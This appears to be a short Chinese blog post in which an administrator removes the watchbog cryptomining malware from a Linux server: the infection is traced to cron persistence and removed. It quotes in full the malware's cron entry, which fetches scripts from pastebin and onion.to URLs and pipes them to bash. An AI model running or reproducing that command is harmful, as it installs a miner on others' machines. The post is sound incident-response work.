watchbog挖矿病毒清除

收到报警,发现cpu 100%,被watchbog进程占用. 

确认不是系统和公司的服务,( watchbog  这个程序想伪装成Linux看门狗watchdog ) .   杀掉,  后面又自启了. 排查原因

可以看到watchbog程序在/bin下,  /tmp目录下有相关文件. 至于为啥自启? 基本可以先看定时任务了. ( 服务器没重启,自启动基本排除. 保险起见,随后可以挨个看一眼 )

 

把定时任务相关的文件全找一遍

 

 

cron.d目录下新增文件 :appache、root、system

cron.hourly   cron.monthly 等里面都找到了相关任务.

*/11 * * * * (curl -fsSL https://pastebin.com/raw/EzqVke6X||wget -q -O- https://pastebin.com/raw/EzqVke6X||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/4HvzG
fGm").read()'||curl -fsSL https://pastebin.com/raw/3FDDiNwW||wget -q -O - https://pastebin.com/raw/3FDDiNwW||curl -fsSLk https://aziplcr72qjhzvin.onion.to/old.txt||wget -q -O - https://azip
lcr72qjhzvin.onion.to/old.txt --no-check-certificate -t 2 -T 60)|bash

  

 解决:  把定时任务的服务先stop了. 再把刚找出来的病毒的定时任务全删除.  然后杀死进程, 把相关程序和相关文件删掉.  最后观测检查一段时间.

看到好多人说redis漏洞引起的.  但这边排查原因本次中毒应该是api接口引起的  10000这个对外端口

netstat -na|grep ESTABLISHED

netstat -lntp|grep 10000

lsof -i:10000

 

https://www.cnblogs.com/forever521Lee/p/10512655.html

posted @ 2019-08-21 13:16  mingetty  阅读(337)  评论(0)    收藏  举报